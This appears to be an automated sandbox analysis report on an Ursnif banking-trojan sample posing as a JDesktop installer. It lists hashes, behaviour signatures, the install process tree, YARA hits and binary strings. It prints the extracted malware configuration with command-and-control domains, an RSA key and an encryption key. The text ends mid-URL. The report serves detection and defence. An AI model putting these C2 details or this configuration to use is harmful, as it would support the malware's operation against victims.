Play interactive tour

Edit tour

Windows Analysis Report jXzrIReInY

Overview

General Information

Sample Name:	jXzrIReInY (renamed file extension from none to exe)
Analysis ID:	528552
MD5:	4ec77eb8280485764b6bc22f6cf7d57e
SHA1:	85215638743eeb6800aaada5d057e96032db6906
SHA256:	716ce7fe411f352686b4071074aa96e1456ab7a67445b3cf1c475e18a4e5ac25
Tags:	BABADEDA-CrypterexeUrsnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Detected unpacking (overwrites its own PE header)

Yara detected Ursnif

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Antivirus detection for dropped file

PE file has a writeable .text section

Writes or reads registry keys via WMI

Writes registry values via WMI

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Drops files with a non-matching file extension (content does not match file extension)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Binary contains a suspicious time stamp

Launches processes in debugging mode, may be used to hinder debugging

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Checks for available system drives (often done to infect USB drives)

Classification

Process Tree

System is w10x64

jXzrIReInY.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\jXzrIReInY.exe" MD5: 4EC77EB8280485764B6BC22F6CF7D57E)

msiexec.exe (PID: 6512 cmdline: C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\adv.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\jXzrIReInY.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1637876902 " AI_EUIMSI=" MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

msiexec.exe (PID: 4360 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 4344 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C5EB72BDE2B80B60A07F51ECA26339C7 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

msiexec.exe (PID: 4852 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 54779E8B78CD501470CD2E1995D98D79 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

plcd-player.exe (PID: 6620 cmdline: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe MD5: 25DDBD309BB8094229704383977C7268)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "GP2bItvzCMVimwFhSq2LMu3Hl69+F5VOC4HbUzLcgCFvHPQPwYycui0JiyqQuwt1jV1IDboN9TEBxLB8CQWBGqcjZkZnRvT4fL8wjq8CCeHOLprVhSXFIxyR2QXzTHDcHr2ux9/r22BaiLqlqlqcKQ1PI6I3WFn39M0K5k1WypMPthcpEVFSO8sVBHvcqRSV", "c2_domain": ["get.updates.avast.cn", "huyasos.in", "curves.ws", "huyasos.in", "rorobrun.in", "huyasos.in", "tfslld.ws", "huyasos.in"], "botnet": "2002", "server": "12", "serpent_key": "44004499FJFHGTYB", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000011.00000002.530777240.00000000035F9000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000011.00000002.530869037.0000000003BA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: plcd-player.exe PID: 6620	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security

Unpacked PEs

Source	Rule	Description	Author
17.2.plcd-player.exe.35f94a0.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
17.2.plcd-player.exe.35f94a0.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
17.2.plcd-player.exe.2ce0000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 17.2.plcd-player.exe.2ce0000.1.unpack

Malware Configuration Extractor: Ursnif {"RSA Public Key": "GP2bItvzCMVimwFhSq2LMu3Hl69+F5VOC4HbUzLcgCFvHPQPwYycui0JiyqQuwt1jV1IDboN9TEBxLB8CQWBGqcjZkZnRvT4fL8wjq8CCeHOLprVhSXFIxyR2QXzTHDcHr2ux9/r22BaiLqlqlqcKQ1PI6I3WFn39M0K5k1WypMPthcpEVFSO8sVBHvcqRSV", "c2_domain": ["get.updates.avast.cn", "huyasos.in", "curves.ws", "huyasos.in", "rorobrun.in", "huyasos.in", "tfslld.ws", "huyasos.in"], "botnet": "2002", "server": "12", "serpent_key": "44004499FJFHGTYB", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: jXzrIReInY.exe	Virustotal: Detection: 52%	Perma Link
Source: jXzrIReInY.exe	Metadefender: Detection: 22%	Perma Link
Source: jXzrIReInY.exe	ReversingLabs: Detection: 35%

Antivirus / Scanner detection for submitted sample

Show sources

Source: jXzrIReInY.exe

Avira: detected

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\lcms-5.0.dll	Avira: detection malicious, Label: TR/Redcap.chbhs
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\plcd-player.exe	Avira: detection malicious, Label: TR/Agent.kkknq

Source: 17.2.plcd-player.exe.1a0000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen8

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Unpacked PE file: 17.2.plcd-player.exe.1a0000.0.unpack

Source: jXzrIReInY.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\CrashRpt License.txt	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\License.txt	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\License.txt	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\CrashRpt License.txt	Jump to behavior

Source: jXzrIReInY.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: c:\Data\SkyDrive\Programming\Projects\Delimon\Delimon.Win32.IO 2013\Win32FileLibrary\obj\Release\Delimon.Win32.IO.pdb source: jXzrIReInY.exe, 00000000.00000003.312652957.0000000005CE6000.00000004.00000001.sdmp, Delimon.Win32.IO.dll.0.dr
Source:	Binary string: C:\JobRelease\win\Release\stubs\x86\Decoder.pdb source: jXzrIReInY.exe, decoder.dll.0.dr
Source:	Binary string: C:\OpenSSL\Temp\openssl-1.0.2g-x32\out32dll\ssleay32.pdb @ source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr
Source:	Binary string: C:\JobRelease\win\Release\stubs\x86\Decoder.pdb2 source: jXzrIReInY.exe, decoder.dll.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSI4D2.tmp.0.dr, MSIA463.tmp.4.dr
Source:	Binary string: E:\JenkinsWorkspaces\v3-trebuchet-release\AWSDotNetPublic\sdk\src\Services\SimpleDB\obj\net35\Release\net35\AWSSDK.SimpleDB.pdbp source: jXzrIReInY.exe, 00000000.00000003.312652957.0000000005CE6000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.4.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb] source: jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSI4D2.tmp.0.dr, MSIA463.tmp.4.dr
Source:	Binary string: C:\JobRelease\win\Release\stubs\x86\ExternalUi.pdbk source: jXzrIReInY.exe
Source:	Binary string: D:\a\1\s\artifacts\obj\Microsoft.Azure.KeyVault.Core\Release\net452\Microsoft.Azure.KeyVault.Core.pdb source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.4.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSIA23E.tmp.4.dr
Source:	Binary string: C:\JobRelease\win\Release\stubs\x86\ExternalUi.pdb source: jXzrIReInY.exe
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\Prereq.pdb source: jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp
Source:	Binary string: E:\JenkinsWorkspaces\v3-trebuchet-release\AWSDotNetPublic\sdk\src\Services\SimpleDB\obj\net35\Release\net35\AWSSDK.SimpleDB.pdb source: jXzrIReInY.exe, 00000000.00000003.312652957.0000000005CE6000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.4.dr
Source:	Binary string: C:\Users\User\AppData\Local\Temp\icu_32\lib\icuio.pdb source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\Prereq.pdbi source: jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\User\AppData\Local\Temp\icu_32\lib\icuio.pdb"" source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp
Source:	Binary string: C:\OpenSSL\Temp\openssl-1.0.2g-x32\out32dll\ssleay32.pdb source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr
Source:	Binary string: C:\OpenSSL\Temp\openssl-1.0.2g-x32\out32dll\libeay32.pdb0k source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp
Source:	Binary string: C:\OpenSSL\Temp\openssl-1.0.2g-x32\out32dll\libeay32.pdb source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp
Source:	Binary string: c:\b\4741\2125\src\intermediate\System.Threading.Tasks.v2.5.csproj_75e1c727\Release\System.Threading.Tasks.pdb source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp
Source:	Binary string: D:\a\1\s\artifacts\obj\Microsoft.Azure.KeyVault.Core\Release\net452\Microsoft.Azure.KeyVault.Core.pdbSHA256 source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.4.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbj source: jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSIA23E.tmp.4.dr
Source:	Binary string: d:\projects\SslCertBinding.Net\src\SslCertBinding.Net\obj\Release\SslCertBinding.Net.pdb source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\lzmaextractor.pdb source: jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: a:	Jump to behavior

Source: jXzrIReInY.exe, 00000000.00000000.257327545.0000000000435000.00000002.00020000.sdmp, jXzrIReInY.exe, 00000000.00000002.350001500.0000000000435000.00000002.00020000.sdmp	String found in binary or memory: !7Shell32.dllShlwapi.dllbinSoftware\JavaSoft\Java Runtime Environment\Software\JavaSoft\Java Development Kit\JavaHomeFlashWindowFlashWindowExKernel32.dllGetPackagePathhttp://www.yahoo.comhttp://www.google.comTESThttp://www.example.comtin9999.tmp.partattachmentHEAD "=charsetfilename123DLDutf-8POSTISO-8859-1utf-16AdvancedInstallerUS-ASCIILocal Network ServerGET/FTP ServerRange: bytes=%u- equals www.yahoo.com (Yahoo)
Source: jXzrIReInY.exe	String found in binary or memory: !LShell32.dllShlwapi.dllbinSoftware\JavaSoft\Java Runtime Environment\Software\JavaSoft\Java Development Kit\JavaHomeFlashWindowFlashWindowExKernel32.dllGetPackagePathhttp://www.yahoo.comhttp://www.google.comTESThttp://www.example.comtin9999.tmp.partattachmentHEAD "=charsetfilename123DLDutf-8POSTISO-8859-1utf-16AdvancedInstallerUS-ASCIILocal Network ServerGET/FTP ServerRange: bytes=%u- equals www.yahoo.com (Yahoo)

Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	String found in binary or memory: http://aia.startssl.com/certs/ca.crt02
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	String found in binary or memory: http://aia.startssl.com/certs/sub.class2.code.ca.crt0#
Source: jXzrIReInY.exe, 00000000.00000003.312512625.0000000005C19000.00000004.00000001.sdmp, plcd-player.exe, 00000011.00000002.527502141.000000000040A000.00000002.00020000.sdmp	String found in binary or memory: http://apache.org/xml/UnknownNSUCS4UCS-4UCS_4UTF-32ISO-10646-UCS-4UCS-4
Source: jXzrIReInY.exe, 00000000.00000003.312512625.0000000005C19000.00000004.00000001.sdmp, plcd-player.exe, 00000011.00000002.527502141.000000000040A000.00000002.00020000.sdmp	String found in binary or memory: http://apache.org/xml/messages/XML4CErrors#FIXEDEBCDIC-CP-USIBM037IBM1047IBM-1047IBM1140IBM01140CCSI
Source: jXzrIReInY.exe, 00000000.00000003.312512625.0000000005C19000.00000004.00000001.sdmp, plcd-player.exe, 00000011.00000002.527502141.000000000040A000.00000002.00020000.sdmp	String found in binary or memory: http://apache.org/xml/messages/XMLValidityWINDOWS-1252XERCES-XMLCHhttp://apache.org/xml/messages/XML
Source: jXzrIReInY.exe, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, AWSSDK.SimpleDB.dll.4.dr, MSIA463.tmp.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: jXzrIReInY.exe, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, AWSSDK.SimpleDB.dll.4.dr, MSIA463.tmp.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: jXzrIReInY.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: jXzrIReInY.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.312652957.0000000005CE6000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.4.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.312652957.0000000005CE6000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.4.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSAExtendedValidationCodeSigningCA.crl0
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: jXzrIReInY.exe, 00000000.00000002.351250737.0000000003B7F000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.348127021.0000000003B71000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: jXzrIReInY.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: jXzrIReInY.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	String found in binary or memory: http://crl.startssl.com/crtc2-crl.crl0
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	String found in binary or memory: http://crl.startssl.com/sfsca.crl0C
Source: jXzrIReInY.exe, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, AWSSDK.SimpleDB.dll.4.dr, MSIA463.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: jXzrIReInY.exe, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, AWSSDK.SimpleDB.dll.4.dr, MSIA463.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: jXzrIReInY.exe, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, AWSSDK.SimpleDB.dll.4.dr, MSIA463.tmp.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: jXzrIReInY.exe, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, AWSSDK.SimpleDB.dll.4.dr, MSIA463.tmp.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: jXzrIReInY.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: jXzrIReInY.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: jXzrIReInY.exe, 00000000.00000003.266930196.0000000001624000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.266967151.0000000001624000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/j
Source: jXzrIReInY.exe, 00000000.00000002.351250737.0000000003B7F000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.348127021.0000000003B71000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: jXzrIReInY.exe, 00000000.00000002.351250737.0000000003B7F000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.348127021.0000000003B71000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: jXzrIReInY.exe, 00000000.00000003.266901842.0000000001600000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e63855f36c428
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	String found in binary or memory: http://icu-project.org
Source: jXzrIReInY.exe, 00000000.00000003.267465626.0000000001622000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.267660560.000000000163F000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.266930196.0000000001624000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.266967151.0000000001624000.00000004.00000001.sdmp	String found in binary or memory: http://locdl.windowsupdate.com/
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	String found in binary or memory: http://mybusinesscatalog.com0
Source: jXzrIReInY.exe, AWSSDK.SimpleDB.dll.4.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.312652957.0000000005CE6000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.4.dr	String found in binary or memory: http://ocsp.comodoca.com0B
Source: jXzrIReInY.exe, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, AWSSDK.SimpleDB.dll.4.dr, MSIA463.tmp.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: jXzrIReInY.exe, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, AWSSDK.SimpleDB.dll.4.dr, MSIA463.tmp.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: jXzrIReInY.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: jXzrIReInY.exe	String found in binary or memory: http://ocsp.sectigo.com0)
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	String found in binary or memory: http://ocsp.startssl.com/ca00
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	String found in binary or memory: http://ocsp.startssl.com/sub/class2/code/ca0
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, MSIA463.tmp.4.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, MSIA463.tmp.4.dr	String found in binary or memory: http://t2.symcb.com0
Source: jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, MSIA463.tmp.4.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, MSIA463.tmp.4.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, MSIA463.tmp.4.dr	String found in binary or memory: http://tl.symcd.com0&
Source: jXzrIReInY.exe, 00000000.00000003.311251809.00000000058F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.MyBusinessCatalog.com
Source: jXzrIReInY.exe, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, AWSSDK.SimpleDB.dll.4.dr, MSIA463.tmp.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: jXzrIReInY.exe, 00000000.00000003.311251809.00000000058F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.ecb.int/vocabulary/2002-08-01/eurofxref
Source: jXzrIReInY.exe, 00000000.00000003.311251809.00000000058F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.gesmes.org/xml/2002-08-01
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	String found in binary or memory: http://www.openssl.org/V
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html....................rbwb.rndC:HOMERANDFILEPRNG
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	String found in binary or memory: http://www.startssl.com/0
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	String found in binary or memory: http://www.startssl.com/policy.pdf0
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	String found in binary or memory: http://www.unicode.org/copyright.html
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.4.dr	String found in binary or memory: https://aka.ms/azsdkvalueprop.
Source: currencysystem5.json.0.dr	String found in binary or memory: https://currencysystem.com
Source: jXzrIReInY.exe, 00000000.00000003.311251809.00000000058F0000.00000004.00000001.sdmp	String found in binary or memory: https://currencysystem.com/gfx/pub/script-button-88x31.gif
Source: jXzrIReInY.exe, 00000000.00000003.311251809.00000000058F0000.00000004.00000001.sdmp, currencysystem5.json.0.dr	String found in binary or memory: https://currencysystem.com/gfx/pub/script-button-88x31.png
Source: jXzrIReInY.exe, 00000000.00000003.311251809.00000000058F0000.00000004.00000001.sdmp	String found in binary or memory: https://currencysystem.com/gfx/pub/script-icon-16x16.gif
Source: jXzrIReInY.exe, 00000000.00000003.311251809.00000000058F0000.00000004.00000001.sdmp, currencysystem5.json.0.dr	String found in binary or memory: https://currencysystem.com/gfx/pub/script-icon-16x16.png
Source: plcd-player.exe, 00000011.00000002.530727824.00000000031EB000.00000004.00000010.sdmp	String found in binary or memory: https://get.u
